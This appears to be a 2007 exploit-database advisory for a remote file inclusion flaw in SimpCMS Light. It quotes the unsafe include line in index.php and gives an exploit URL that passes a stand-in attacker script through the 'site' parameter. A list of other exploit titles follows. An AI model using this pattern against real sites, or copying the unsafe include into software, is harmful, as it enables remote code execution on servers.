exploits , vulnerabilities , articles , SimpCMS Light <= 04.10.2007 (site) Remote File Inclusion Vulnerability

2007-04-10

SimpCMS Light <= 04.10.2007 (site) Remote File Inclusion Vulnerability

Rated as : Moderate Risk

Bug Found By Dr.RoVeR -->Arab48 Hacker

Contact: Dr.RoVeR@HackerMail.CoM
---

Script: SimpCMS Light

Download: http://www.simpcms.com/light/normal/simp-cms-light.zip

--

Bug File: index.php

Bug code in line 31:
include $site.".php";

--

Exploit:
http://site.com/[path]/index.php?site=[EvilScript]

securitydot.net - 2007-04-10

Exploits - newest 10 RSS | More

2007-06-15 56118 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33414 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41551 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28776 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19310 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16327 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18963 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16208 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33025 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16843 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit